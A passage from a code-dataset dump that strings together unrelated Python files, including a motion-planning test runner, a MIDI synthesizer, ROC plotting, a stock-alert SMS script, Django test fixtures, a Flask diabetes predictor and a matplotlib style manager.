'Dubins2':{'selectionRadius':0.25,'witnessRadius':0.2}\n }\n\ndef parseParameters(problem,planner):\n global defaultParameters,customParameters\n params = copy.deepcopy(defaultParameters)\n if problem in customParameters:\n params.update(customParameters[problem])\n if '(' in planner:\n #parse out key=value,... string\n name,args = planner.split('(',1)\n if args[-1] != ')':\n raise ValueError(\"Planner string expression must have balanced parenthesis, i.e.: func ( arglist )\")\n args = args[:-1]\n args = args.split(',')\n for arg in args:\n kv = arg.split(\"=\")\n if len(kv) != 2:\n raise ValueError(\"Unable to parse argument \"+arg)\n try:\n params[kv[0]] = int(kv[1])\n except ValueError:\n try:\n params[kv[0]] = float(kv[1])\n except ValueError:\n params[kv[0]] = kv[1]\n planner = name\n return planner,params\n\ndef runTests(problems = None,planners = None):\n global all_planners,all_problems\n if planners == None or planners == 'all' or planners[0] == 'all':\n planners = all_planners\n\n if problems == None or problems == 'all' or problems[0] == 'all':\n problems = all_problems.keys()\n\n for prname in problems:\n pr = all_problems[prname]\n for p in planners:\n p,params = parseParameters(prname,p)\n maxTime = params['maxTime']\n del params['maxTime']\n if pr.differentiallyConstrained() and p in allplanners.kinematicPlanners:\n #p does not support differentially constrained problems\n continue\n testPlannerDefault(pr,prname,maxTime,p,**params)\n print(\"Finished test on problem\",prname,\"with planner\",p)\n print(\"Parameters:\")\n for (k,v) in iteritems(params):\n print(\" \",k,\":\",v)\n return\n\ndef runViz(problem,planner):\n #runVisualizer(rrtChallengeTest(),type=planner,nextStateSamplingRange=0.15,edgeCheckTolerance = 0.005)\n planner,params = parseParameters(problem,planner)\n if 'maxTime' in params:\n del params['maxTime']\n \n print(\"Planning on problem\",problem,\"with planner\",planner)\n print(\"Parameters:\")\n for (k,v) in iteritems(params):\n print(\" \",k,\":\",v)\n runVisualizer(all_problems[problem],type=planner,**params)\n \nif __name__==\"__main__\":\n #HACK: uncomment one of these to test manually\n #runViz('Kink','rrt*')\n #test KD-tree in noneuclidean spaces\n #runViz('Pendulum','ao-rrt(numControlSamples=10,nearestNeighborMethod=bruteforce)')\n #runViz('Pendulum','ao-rrt')\n #runViz('Dubins','stable-sparse-rrt(selectionRadius=0.25,witnessRadius=0.2)')\n #runViz('DoubleIntegrator','stable-sparse-rrt(selectionRadius=0.3,witnessRadius=0.3)')\n #runViz('Pendulum','stable-sparse-rrt(selectionRadius=0.3,witnessRadius=0.16)')\n #runViz('Flappy','stable-sparse-rrt(selectionRadius=70,witnessRadius=35)')\n\n if len(sys.argv) < 3:\n print(\"Usage: main.py [-v] Problem Planner1 ... Plannerk\")\n print()\n print(\" Problem can be one of:\")\n print(\" \",\",\\n \".join(sorted(all_problems)))\n print(\" or 'all' to test all problems.\")\n print()\n print(\" Planner can be one of:\")\n print(\" \",\",\\n \".join(sorted(all_planners)))\n print(\" or 'all' to test all planners.\")\n print()\n print(\" If -v is provided, runs an OpenGL visualization of planning\")\n exit(0)\n if sys.argv[1] == '-v':\n from pomp.visualizer import runVisualizer\n #visualization mode\n print(\"Testing visualization with problem\",sys.argv[2],\"and planner\",sys.argv[3])\n runViz(sys.argv[2],sys.argv[3])\n else:\n print()\n print(\"Testing problems\",sys.argv[1],\"with planners\",sys.argv[2:])\n runTests(problems=[sys.argv[1]],planners=sys.argv[2:])\n","repo_name":"krishauser/pyOptimalMotionPlanning","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6097,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"32"} +{"seq_id":"22940613806","text":"import mido\nimport numpy as np\n\n######################################\n######################################\n######################################\n\ndef midinote2freq(n):\n A = 440 # Frecuencia de LA\n An = 69 # Valor correspondiente a LA440 en midi\n # distance = abs(An - n)\n # if n < An:\n # return A * 2 ** (-distance / 12)\n # else:\n # return A * 2 ** (distance / 12)\n distance = n - An\n return A * 2 ** (distance / 12)\n\n\ndef get_tempo(mid_):\n for msg in mid_: # Search for tempo\n if msg.type == 'set_tempo':\n return msg.tempo\n # return msg.tempo*2\n\n\nclass Midi:\n def __init__(self, file_name, sample_rate = 44100):\n self.mid_object = None\n self.tracks_midi_list = None\n self.amount_of_tracks = 0\n self.file_name = file_name\n self.sample_rate = sample_rate\n self.wav_list = None\n self.sec_per_tick = 0\n self.duration_in_s = 0\n self.parserMidi()\n\n def parserMidi(self):\n self.mid_object = mido.MidiFile(self.file_name, clip=True)\n self.amount_of_tracks = len(self.mid_object.tracks)\n\n \n num_mess = [] # Sacando los duplicados, segun la documentacion\n dup = []\n\n for track in self.mid_object.tracks:\n if len(track) in num_mess:\n dup.append(track)\n else:\n num_mess.append(len(track))\n for track in dup:\n self.mid_object.tracks.remove(track)\n\n \n tracks_midi_list_dict = [[] for i in range(self.amount_of_tracks)]\n self.tracks_midi_list = [[] for i in range(self.amount_of_tracks)]\n\n for j, track in enumerate(self.mid_object.tracks): # Solo las que tienen on y off \n for i in track:\n if i.type == 'note_on' or i.type == 'note_off':\n tracks_midi_list_dict[j].append(i.dict())\n \n for j, track in enumerate(tracks_midi_list_dict): # Los tiempos que da midi son deltas, se pasan a absolutos\n time_data = 0.0\n for i in track:\n time = i['time'] + time_data\n i['time'] = time\n time_data = time\n if i['type'] == 'note_on' and i['velocity'] == 0:\n i['type'] = 'note_off'\n # El formato queda [type, note, time, velocity, channel]\n message_data = []\n if i['type'] == 'note_on' or i['type'] == 'note_off':\n message_data.append(i['type'])\n message_data.append(i['note'])\n message_data.append(i['time'])\n message_data.append(i['velocity'])\n message_data.append(i['channel'])\n self.tracks_midi_list[j].append(message_data)\n\n self.tracks_midi_list = [x for x in self.tracks_midi_list if x != []] # sacas las vacias\n self.amount_of_tracks = len(self.tracks_midi_list)\n self.duration_in_s = self.mid_object.length # duration_in_s en segundos\n tempo = get_tempo(self.mid_object) # Microsegundos por beat\n tempo_s = tempo / 1e6 # Segundos por beat\n self.sec_per_tick = tempo_s / self.mid_object.ticks_per_beat\n # self.wav_list = [np.zeros(int(self.sample_rate * self.duration_in_s)) for i in range(self.amount_of_tracks)] #lista de numpy arrays\n self.wav_list = [np.zeros((int(self.sample_rate * self.duration_in_s), 2)) for i in range(self.amount_of_tracks)]\n\n def synthesize_track(self, track, function): #(note, vel, duration_in_s)\n self.wav_list[track] = np.zeros(self.wav_list[track].shape)\n for j, message_data in enumerate(self.tracks_midi_list[track]):\n if message_data[0] == 'note_on':\n A = message_data[3] \n m = 1\n tick_start = message_data[2] # format is [type, note, time, velocity, channel]\n while self.tracks_midi_list[track][j + m][0] != 'note off' and self.tracks_midi_list[track][j + m][1] != \\\n message_data[1]:\n m += 1\n tick_end = self.tracks_midi_list[track][j + m][2]\n delta_ticks = tick_end - tick_start\n delta_t = delta_ticks * self.sec_per_tick\n n = int(self.sample_rate * tick_start * self.sec_per_tick)\n arr = function(message_data[1], A, delta_t)\n if arr.ndim == 1:\n arr = arr.reshape((-1, 1))\n wave = np.zeros((n, arr.shape[1]))\n wave = np.append(wave, arr, axis=0)\n if self.wav_list[track].shape[0] < wave.shape[0]:\n wave = wave[:self.wav_list[track].shape[0]]\n else:\n wave = np.append(wave, np.zeros((self.wav_list[track].shape[0] - wave.shape[0], wave.shape[1])), axis=0)\n self.wav_list[track] = np.add(self.wav_list[track], wave)\n maxVal = np.max(np.abs(self.wav_list[track]), axis=0)\n self.wav_list[track] /= np.maximum(1, maxVal)\n\n def weighTracks(self, midiArr):\n weighArr = np.sum(midiArr, axis=0)\n return weighArr / np.maximum(1, np.max(np.abs(weighArr), axis=0))\n\n######################################\n######################################\n######################################\n\n\nif __name__ == '__main__':\n\n from src.synthesizers.sampleSynth.sample_synth import sample_synth\n from scipy.io.wavfile import write\n\n synthBethoven = Midi('Beethoven-Moonlight-Sonata.mid')\n synthBethoven.synthesize_track(0, sample_synth)\n synthBethoven.synthesize_track(1, sample_synth)\n\n\n write(\"Beethoven.wav\", 44100, synthBethoven.weighTracks(synthBethoven.wav_list).astype(np.float32))","repo_name":"sergioandyp/ASSD-TP2","sub_path":"SynThool/src/MIDI/Midi.py","file_name":"Midi.py","file_ext":"py","file_size_in_byte":5759,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25597327923","text":"import matplotlib.pyplot as plt\nfrom sklearn.metrics import roc_curve, auc\nimport os\nimport pandas as pd\n\n\ndef save_roc(targets, scores, title, name):\n plt.figure()\n fpr, tpr, _ = roc_curve(targets, scores)\n roc_auc = auc(fpr, tpr)\n\n #roc_auc = round(roc_auc, 2)\n #roc_auc = str(roc_auc)\n #roc_auc = roc_auc[0] + '·' + roc_auc[2:]\n\n # plt.figure(figsize=(10, 10))\n plt.plot([0, 1], [0, 1], 'k--')\n plt.plot(fpr, tpr,color='steelblue', label='ROC curve (area = %0.2f)' % roc_auc)\n #plt.plot(fpr, tpr, color='steelblue', label='{} (AUC={},{}-{})'.format('Hepatobiliary disease', roc_auc,'0·65','0·71'))\n plt.xlabel('False positive rate')\n plt.ylabel('True positive rate')\n #plt.title(title)\n plt.legend(loc='lower right',prop = {'size':7.5})\n #plt.legend(loc='best')\n plt.savefig(name + '.tiff')\n\n\ndef all_roc_plot(root,name,diseases_types,colors,confidence_set):\n for j,txt_file in enumerate(os.listdir(root)):\n if txt_file == 'gray_iris':\n continue\n results = open(root + txt_file).read().split('\\n')\n labels = []\n scores = []\n for i,row in enumerate(results):\n row = row.split(',')\n if i == 0 or i == len(results) - 1:\n continue\n labels.append(int(row[2]))\n scores.append(float(row[4]))\n\n #plt.figure()\n fpr, tpr, _ = roc_curve(labels, scores)\n\n roc_auc = auc(fpr, tpr)\n roc_auc = round(roc_auc,2)\n roc_auc = str(roc_auc)\n if len(roc_auc) != 4:\n roc_auc = roc_auc + '0'\n roc_auc = roc_auc[0] + '·' + roc_auc[2:]\n\n plt.plot([0, 1], [0, 1], 'k--')\n #plt.tick_params(labelsize=5)\n # plt.plot(fpr, tpr,color=colors[j], label='{} (AUC=%0.2f,{}-{})'.format(diseases_types[j],confidence_set[j][0],confidence_set[j][1]) % roc_auc)\n plt.plot(fpr, tpr, color=colors[j], label='{} (AUC={},{}-{})'.format(diseases_types[j], roc_auc,confidence_set[j][0],\n confidence_set[j][1]))\n plt.xlabel('1-Specificity')\n plt.ylabel('Sensitivity')\n #plt.title(title)\n plt.legend(loc='best',prop = {'size':7.5})\n #plt.savefig(name + '.tiff')\n plt.savefig(name + '.pdf', format='PDF', transparent=True, dpi=300, pad_inches=0)\n\n\n\nif __name__ == '__main__':\n root_slitlamp = ''\n root_fundus = ''\n name = ''\n diseases_types = ['Hepatobiliary Diseases','Liver cancer','Liver cirrhosis','Chronic viral Hepatitis',\n 'Nonalcoholic fatty liver disease','Cholelithiasis',\n 'Hepatic cyst']\n colors = ['crimson','chocolate','steelblue','rosybrown','darkkhaki','cadetblue','lightslategrey']\n # slitlamp\n #confidence_set = []\n #all_roc_plot(root_slitlamp, name, diseases_types, colors, confidence_set)\n\n # fundus\n confidence_set=[]\n all_roc_plot(root_fundus,name,diseases_types,colors,confidence_set)\n\n\n #from PIL import Image\n #im = Image.open('')\n #im.save('', dpi=(300.0, 300.0))\n #plt.savefig()\n #im.savefig('', format='PDF', transparent=True, dpi=300, pad_inches=0)","repo_name":"zoc-x/hepatobiliary-diseases","sub_path":"predict/utils/plot_roc.py","file_name":"plot_roc.py","file_ext":"py","file_size_in_byte":3168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"15514642939","text":"##USING ALPACA API\n##USING TWILIO API\n##LIMITATION 200 requests per every minute per API key\n##TASKS: SENDS OVERSOLD STOCK LIST TO A PHONE NUMBER\n##PURPOSE: ALLOW USERS TO EXPLORE DIFFERENT KIND OF OVERSOLD STOCKS IN REVERSAL OF STOCK PRICE\n\n#https://github.com/alpacahq/alpaca-trade-api-python/#restget_barsetsymbols-timeframe-limit-startnone-endnone-afternone-untilnone\n\n##Ideas for improvements\n###FINDING BALANCE IN REQUESTS LIMIT & PERFORMACE SPEED\n###DOES NOT REPEAT PREVIOUS SENT STOCK TAGS\n###EQUIP MULTIPLE STOCK TECHNICAL INDICATORS\n###ALERT SUDDEN DROP IN SPECIFIC STOCK\n###CREATING SPREAD SHEET TO KEEP TRACK SMS SENT\n###EXPLOR FOR MORE NUMPY OPTIONS\n###ALERT FOR STOCKS IN SPECIFIC CATEGORIES\n\n\n\nfrom config import *\n\nimport time,json\nimport requests\nimport numpy as np\nimport alpaca_trade_api as tradeapi\nfrom twilio.rest import Client\nos.getenv('AccountSid')\nos.getenv('AuthToken')\nos.getenv('API_KEY ')\nos.getenv('SECRET_KEY')\nos.getenv('sender_num')\nos.getenv('receiv_num')\n\n\nBASE_URL = \"https://paper-api.alpaca.markets\"\n# ACC_URL = \"{}/v2/account\".format(BASE_URL)\n# ORDER_URL = \"{}/v2/orders\".format(BASE_URL)\nASET_URL = \"{}/v2/assets\".format(BASE_URL)\nSMS_URL = \"https://api.twilio.com/2010-04-01\"\n\nHeaders = {'APCA-API-KEY-ID': API_KEY, 'APCA-API-SECRET-KEY': SECRET_KEY} ##Alpaca market assets \n\napi = tradeapi.REST(API_KEY,SECRET_KEY) ##assets data\n\nclient = Client(AccountSid, AuthToken) ##Twilio SMS\n\n\n\ndef get_account():\n\n resp = requests.get(ACC_URL, headers = Headers)\n return json.loads(resp.content)##load account infos\n\ndef get_asset():\n \n resp = requests.get(ASET_URL, headers = Headers)\n objects = json.loads(resp.content)\n \n \n \n stock = np.array([item[\"symbol\"] for item in objects if \n item[\"exchange\"] == \"NYSE\" and len(item[\"symbol\"]) <=5 ] )\n \n random_stock = np.random.shuffle(stock)\n \n return (stock) ##loads randomized listed stocks on NYSE \n\n \n \n\n\n\ndef create_order(symbol,qty,side,type,time_in_force,extended_hours = False):\n data = {\n \"symbol\" : symbol,\n \"qty\" : qty,\n \"side\" : side,\n \"type\" : type,\n \"time_in_force\": time_in_force,\n }\n order = requests.post(ORDER_URL,json=data, headers = Headers )\n return json.loads(order.content)[\"symbol\"]\n #response = create_order(\"AAPL\",100,\"buy\",\"market\",\"gtc\")##example\n\ndef get_order():\n order = requests.get(ORDER_URL, headers = Headers )\n return json.loads(order.content)\n ##load orders\n \ndef find_stock(array):\n counter = 0\n \n filtered_dict = {}\n for item in array:\n\n try:\n barset = api.get_barset(item, 'day', limit=60)\n ###retrieve stock prices of 60 days\n ticker_close = np.array([barset[item][j].c for j in range(len(barset[item]))])\n ##EVERYDAY PRICE stored in ticker_close\n SMA60 = (round((ticker_close.sum()/60),2))\n ##FIND SIMPLE MOVING AVERAGE of 60 DAYS VALUE\n \n today_close = barset[item][-1].c\n except IndexError: ##IN CASE OF INVALID TAG NAME\n continue\n\n percent_change = ((today_close - SMA60) / SMA60 * 100)\n ##FIND PERCENTAGE CHANGE\n if percent_change < -10: ##FOUND OVERSOLD STOCKS\n \n ##FIND WHICH STOCK IN REVERSAL\n barset_tenDays = api.get_barset(item, 'day', limit=10)\n ##RETREVIE STOCK PRICE 10 DAYS DATA\n close_tenDays = np.array([barset_tenDays[item][i].c for i in range(len(barset_tenDays[item]))])\n ##STROES STOCK PRICE OF TEN DAYS \n \n\n SMA10 = (round((close_tenDays.sum()/10),2))\n ##FOUND SIMPLE MOVING AVERAGE OF 10 DAYS\n tenDays_percent = ((today_close - SMA10) / SMA10 * 100)\n if tenDays_percent > 0:\n \n ##IF DISPARANCY IS GREATER THAN 10%, item stored\n if len(filtered_dict.keys()) >5:\n break\n filtered_dict[item] = round(percent_change,2)\n \n counter +=1\n ##COUNTER ENSURE BREAK FOR A MINUTE\n if (counter % 200 == 0):\n time.sleep(60)\n \n return filtered_dict\n ##RETURN THE DICTIONARY {STOCK NAME : PRICE}\n\nticker = get_asset()\n##ORIGINAL STOCK LIST IS ASSIGNED TO TICKER\n\n##TICKER IS THE PARAMETER FOR FINDING OVERSOLD STOCK\n\ndef send_sms(text):\n sorted(text, key=text.get, reverse=True) ##SORT DICT VALUES\n string = ''\n for key, value in text.items():\n string+= \"{}:{}%\\n\".format(key,str(value))\n ##CREATE STR WITH VALUES\n client.messages.create(body=string, \n ##SENDING STR ON SMS\n from_= sender_num,\n to= receiv_num\n )\n text.clear()\n del string ##RESET THE STRING\n\n\nsend_sms(find_stock(ticker))\n##SENDING SMS\n\n\n\n\n","repo_name":"KaungH/OVERSOLD-QUOTES-ALERT","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4884,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"42660460607","text":"from uuid import UUID\n\nimport graphene.test\nimport pytest\nfrom django.contrib.auth.models import AnonymousUser\nfrom django.db import transaction\n\nfrom tabletop import factories\nfrom tabletop.models import Checkin, CollectionGame, Player\nfrom tabletop.root_schema import schema\n\n\nclass Context(object):\n user = AnonymousUser()\n\n\nclass GqlClient(graphene.test.Client):\n def execute(self, query, user=None):\n context = Context()\n if user:\n context.user = user\n return super().execute(query, context=context)\n\n\n@pytest.fixture\ndef gql_client(db):\n return GqlClient(schema)\n\n\n@pytest.fixture\ndef default_user(db):\n user = factories.UserFactory(\n id=UUID(\"449c76aa-ad6a-46a8-b32b-91d965e3f462\"),\n name=\"Reel Big Phish\",\n email=\"reel.big.phish@example.com\",\n )\n user.set_password(\"phish.reel.big\")\n user.save()\n return user\n\n\n@pytest.fixture\ndef default_publisher(db, default_user):\n return factories.EntityFactory.create(\n id=UUID(\"74451c13-2a97-42a2-b136-03af6cbb4153\"),\n name=\"Guinea Pig Games\",\n created_by=default_user,\n confirmed=True,\n )\n\n\n@pytest.fixture\ndef default_artist(db, default_user):\n return factories.EntityFactory.create(\n id=UUID(\"449c76aa-2a97-42a2-b136-03af6cbb4153\"),\n name=\"John Cusoe\",\n created_by=default_user,\n confirmed=True,\n )\n\n\n@pytest.fixture\ndef default_designer(db, default_user):\n return factories.EntityFactory.create(\n id=UUID(\"449c76aa-2a97-42a2-b136-91d965e3f462\"),\n name=\"John Cusoe\",\n created_by=default_user,\n confirmed=True,\n )\n\n\n@pytest.fixture\ndef default_game(db, default_publisher, default_user):\n return factories.GameFactory.create(\n id=UUID(\"76111b88-301b-4620-9c93-7c6d28f0987b\"),\n name=\"Unsettlers of Qatan\",\n created_by=default_user,\n confirmed=True,\n )\n\n\n@pytest.fixture\ndef default_checkin(db, default_game, default_user):\n checkin = Checkin.objects.create(\n id=UUID(\"4b2a619c-40a8-4f58-96a5-c2f74795bfa7\"),\n game=default_game,\n created_by=default_user,\n )\n Player.objects.create(checkin=checkin, user=default_user)\n return checkin\n\n\n@pytest.fixture\ndef default_collection(db, default_game, default_user):\n with transaction.atomic():\n collection = factories.CollectionFactory.create(\n id=UUID(\"6960436f-53cd-4d00-bd5b-a293349e7d1f\"),\n name=\"My Games\",\n created_by=default_user,\n is_default=True,\n )\n CollectionGame.objects.create(game=default_game, collection=collection)\n return collection\n","repo_name":"dcramer/tabletop-server","sub_path":"conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":2656,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"32"} +{"seq_id":"73080486492","text":"#app.py\r\nfrom flask import Flask,request,render_template\r\nimport requests\r\nimport pickle\r\nimport numpy as np\r\nimport sklearn\r\nfrom sklearn.preprocessing import StandardScaler\r\napp = Flask(__name__)\r\nmodel = pickle.load(open('diabetes_regression_model.pkl', 'rb'))\r\n@app.route('/',methods=['GET'])\r\ndef Home():\r\n return render_template('index.html')\r\n\r\n\r\n@app.route(\"/predict\",methods=['POST'])\r\ndef predict():\r\n if request.method=='POST':\r\n Pregnancies=int(request.form['Pregnancies'])\r\n Glucose=float(request.form['Glucose'])\r\n BloodPressure=float(request.form['BloodPressure'])\r\n SkinThickness=float(request.form['SkinThickness'])\r\n Insulin=float(request.form['Insulin'])\r\n BMI=float(request.form['BMI'])\r\n DiabetesPedgreeFunction=float(request.form['DiabetesPedgreeFunction'])\r\n Age=int(request.form['Age'])\r\n predictions=model.predict([[Pregnancies, Glucose,BloodPressure,SkinThickness,Insulin,BMI,DiabetesPedgreeFunction,Age]])\r\n if predictions==1:\r\n return render_template('index.html', prediction_text= \"Diabetic. \\n Consult doctor\")\r\n else:\r\n return render_template('index.html', prediction_text=\"Non-diabetic.\\n Stay fit and Healthy\")\r\n \r\n else:\r\n return render_template('index.html')\r\n \r\nif __name__==\"__main__\":\r\n app.run(debug=True,use_reloader=False)\r\n \r\n\r\n \r\n \r\n \r\n","repo_name":"ayan-zz/Diabetic-Analysis","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1435,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"18063514864","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nimport clean_nltk as cn\n\ndef main():\n data_directory = \"../Data/\"\n infile = data_directory + \"reviews_clean.csv\"\n outfile = data_directory + \"adjectives_tfidf.csv\"\n df = pd.read_csv(infile)\n\n category_dict = {}\n categories = ['Mexican', 'Italian', 'American']\n for category in categories:\n subset = df[df['category'] == category]\n text = cn.select_text(subset['text'])\n entities = cn.parse_text(text, lemmatize = False)\n adjectives = [str(entity[0]) for entity in entities if entity[-1] == 'JJ']\n adjectives_text = ' '.join(adjectives)\n category_dict[category] = adjectives_text\n\n tfidf = TfidfVectorizer()\n tfs = tfidf.fit_transform(category_dict.values())\n tfidf_data = pd.DataFrame([ pd.SparseSeries(tfs[i].toarray().ravel()) for i in np.arange(tfs.shape[0]) ])\n columns = tfidf.get_feature_names()\n tfidf_data.columns = columns\n tfidf_data.index = category_dict.keys()\n\n tfidf_data = tfidf_data.stack().reset_index()\n tfidf_data = tfidf_data.rename(columns = {'level_0': 'category', 'level_1': 'term', 0: 'tfidf'})\n top_data = tfidf_data.sort(['category', 'tfidf'], ascending = False).groupby('category').head()\n top20_data = tfidf_data.sort(['category', 'tfidf'], ascending = False).groupby('category').head(20)\n top20_data.to_csv(outfile, index = False)\n\nif __name__ == \"__main__\":\n main()","repo_name":"roesler-stan/Yelp-Challenge","sub_path":"nltk/adjectives_tfidf.py","file_name":"adjectives_tfidf.py","file_ext":"py","file_size_in_byte":1493,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"31645865471","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nimport logging\n\nimport sys\nimport re\n\nfrom matplotlib import markers\nfrom matplotlib.markers import TICKLEFT, TICKRIGHT, TICKUP, TICKDOWN, CARETLEFT, CARETRIGHT, CARETUP, CARETDOWN\n\ntry:\n import xml.etree.cElementTree as et\nexcept ImportError:\n import xml.etree.ElementTree as et\n\nMARKERS = ['o', 's', '^', 'v', '<', '>', '.', '1', '2', '3', '4', '8',\n 'p', '*', 'h', 'H', '+', 'x', 'D', 'd', '|', '_', ]\n #TICKLEFT, TICKRIGHT, TICKUP, TICKDOWN, CARETLEFT, CARETRIGHT,\n #CARETUP, CARETDOWN ]\n\nLINESTYLES = ['-', '--', '-.', ':']\n\nFILLSTYLES = ['full', 'left', 'right', 'bottom', 'top', 'none']\n\nHATCHSTYLES = ['-', '|', '||', '|||', '/', '//', '///', '\\\\', '\\\\\\\\', '\\\\\\\\\\\\', '+', 'x', '*', 'o', 'O', '.']\n\nCOLORS_RDBU9 = [0, '#b2182b', '#d6604d', '#f4a582', '#fddbc7', '#cccccc', '#d1e5f0', '#92c5de', '#4393c3', '#2166ac']\nCOLORS_RDBU9C = [0, '#ffffff', '#000000', '#000000', '#000000', '#000000', '#000000', '#000000', '#ffffff', '#ffffff']\nCOLORS_CATEGORY10 = ['#1f77b4', '#ff7f0e', '#2ca02c', '#d62728', '#9467bd', '#8c564b', '#e377c2', '#7f7f7f', '#bcbd22', '#17becf']\nCOLORS_MATPLOTLIB = ['b', 'g', 'r', 'c', 'm', 'y', 'k', 'w']\n\nMATCH_EXACT = 1\nMATCH_CONTAINS = 2\nMATCH_START = 3\nMATCH_END = 4\nMATCH_REGEXP = 5\n\n\nclass StylesManager(object):\n '''\n Interface to return a marker and colour combination for a given classifier\n \n Holds a number of ClassMatch objects that are run against each request, applying \n a given set of attributes (color, marker, etc.) for each one.\n \n Returns a CategoryMarker object that describes the complete style set.\n '''\n\n def __init__(self):\n self.matchdefs = [] # User defined match definitions\n self.automatchdefs = [] # Automatic match definitions (applied after, non-static but consistent)\n\n def add_match_definition(self):\n cm_def = ClassMatchDefinition()\n # Get unique marker definition (algo)\n # def = self.get_unique_marker_definition()\n ls_def = StyleDefinition()\n\n def get_style_for_class(self, classname):\n '''\n Run through each match and definition in turn, applying any non-None value to \n a cumulative marker definition. Return the result for use to assign a color.\n \n If we reach the end without a single hit, means we've got an unmatched class and\n need to assign a generic, unique, colour/label set to it. This must be stored\n (as an auto-assignment) to ensure the same class still receives the same label in future. \n '''\n is_matched = False\n ls_def = StyleDefinition()\n\n for cm_def, ls_definition in self.matchdefs:\n if cm_def.is_match_for_class(classname):\n # We have a match, extract and apply the set\n is_matched = True\n ls_def.import_from(ls_definition)\n\n if is_matched:\n # If we've previously generated an automatch marker for this we need to remove it\n self.automatchdefs = [(cm, ls) for cm, ls in self.automatchdefs if cm.match_str != classname]\n return ls_def\n\n else:\n # No custom match, only automatch definitions to test now\n for cm_def, ls_definition in self.automatchdefs:\n if cm_def.is_match_for_class(classname):\n # We have a match, set it\n return ls_definition\n # If we're here, means we've still not matched\n # We need to generate a unique marker and provide a default marker def (unique match)\n # to ensure class receives the same marker in future\n cm_def = ClassMatchDefinition(classname, MATCH_EXACT, is_auto=True)\n ls_def = self.get_unique_style_definition()\n self.automatchdefs.append((cm_def, ls_def))\n\n return ls_def\n\n def get_unique_style_definition(self):\n '''\n Assign a unique marker definition using standard progression set\n Note: this is only guaranteed to be unique at the point of assignment,\n subsequent filters/assignments may give identical output\n FIXME: Watch for clashes and fix, then refresh\n '''\n\n # Get a list of all StyleDefinitions currently in use\n currently_in_use = [ls_def for cm_def, ls_def in self.matchdefs + self.automatchdefs]\n for m in MARKERS:\n for l in LINESTYLES:\n for c in COLORS_CATEGORY10:\n ls_def = StyleDefinition(marker=m, linestyle=l, linewidth=1, color=c, markerfacecolor=c, markersize=5, fillstyle='full')\n if ls_def not in currently_in_use:\n return ls_def\n\n return None\n\n def getXMLMatchDefinitionsStyles(self, root):\n\n # Iterate over the entire set (in order) creating a XML representation of the MatchDef and Style\n for cm, ls in self.matchdefs + self.automatchdefs:\n\n cmls = et.SubElement(root, \"ClassMatchStyle\")\n if cm.is_auto:\n cmls.set('is_auto', 'true')\n\n cme = et.SubElement(cmls, \"ClassMatch\")\n cme.set(\"match_str\", cm.match_str)\n cme.set(\"match_type\", str(cm.match_type))\n\n lse = et.SubElement(cmls, \"Style\")\n\n for attr in ls.attr:\n value = ls.__dict__[attr]\n if value != None: # We can skip None values (default anyway)\n lse.set(attr, str(value))\n\n return root\n\n def setXMLMatchDefinitionsStyles(self, root):\n\n self.automatchdefs = []\n self.matchdefs = []\n\n convert = {\n 'linestyle': str,\n 'color': str,\n 'linewidth': float,\n 'marker': str,\n 'markersize': float,\n 'markeredgecolor': str,\n 'markerfacecolor': str,\n 'fillstyle': str,\n 'hatch': str,\n }\n\n for cmls in root.findall('ClassMatchStyle'):\n\n cm = ClassMatchDefinition()\n ls = StyleDefinition()\n\n cme = cmls.find('ClassMatch')\n cm.match_str = cme.get('match_str')\n cm.match_type = int(cme.get('match_type'))\n\n lse = cmls.find('Style')\n for attr in ls.attr:\n ls.__dict__[attr] = convert[attr](lse.get(attr, None))\n\n # Fix types\n ls.linewidth = float(ls.linewidth)\n if cmls.get('is_auto', False):\n cm.is_auto = True\n self.automatchdefs.append((cm, ls))\n else:\n self.matchdefs.append((cm, ls))\n\n\nclass StyleDefinition(object):\n '''\n \n '''\n line_attr = ['linestyle', 'color', 'linewidth']\n marker_attr = ['marker', 'markersize', 'markeredgecolor', 'markerfacecolor', 'fillstyle']\n hatch_attr = ['hatch']\n attr = line_attr + marker_attr + hatch_attr\n\n def __eq__(self, other):\n for attr in self.attr:\n if other.__dict__[attr] != self.__dict__[attr]:\n return False\n return True\n\n def __repr__(self):\n return \"StyleDefinition(%s)\" % self.__unicode__()\n\n def __unicode__(self):\n return ', '.join(['%s=%s' % (attr, self.__dict__[attr]) for attr in self.attr])\n\n def __init__(self, marker=None, markersize=None, markeredgecolor=None, markerfacecolor=None, fillstyle=None, linewidth=None, linestyle=None, color=None, hatch=None):\n\n self.marker = marker\n self.markersize = markersize\n self.markeredgecolor = markeredgecolor\n self.markerfacecolor = markerfacecolor\n self.fillstyle = fillstyle\n self.linestyle = linestyle\n self.linewidth = linewidth\n self.color = color\n self.hatch = hatch\n\n def import_from(self, ls_def):\n '''\n Apply any non-none components of the specified linestyle definition to this one\n producing a composite linestyle definition\n '''\n for attr in self.attr:\n if ls_def.__dict__[attr] != None:\n self.__dict__[attr] = ls_def.__dict__[attr]\n\n @property\n def kwargs(self):\n '''\n Return the style definition as a list of kwargs (where set)\n can be applied directly to the plot command\n '''\n return {attr: self.__dict__[attr] for attr in self.attr if self.__dict__[attr] != None}\n\n @property\n def line_kwargs(self):\n '''\n Return the line style definition as a list of kwargs (where set)\n can be applied directly to the plot command\n '''\n return {attr: self.__dict__[attr] for attr in self.line_attr if self.__dict__[attr] != None}\n\n @property\n def marker_kwargs(self):\n '''\n Return the marker style definition as a list of kwargs (where set)\n can be applied directly to the plot command\n '''\n return {attr: self.__dict__[attr] for attr in self.marker_attr if self.__dict__[attr] != None}\n\n @property\n def bar_kwargs(self):\n kw_attr = {'fc': 'markerfacecolor', 'ec': 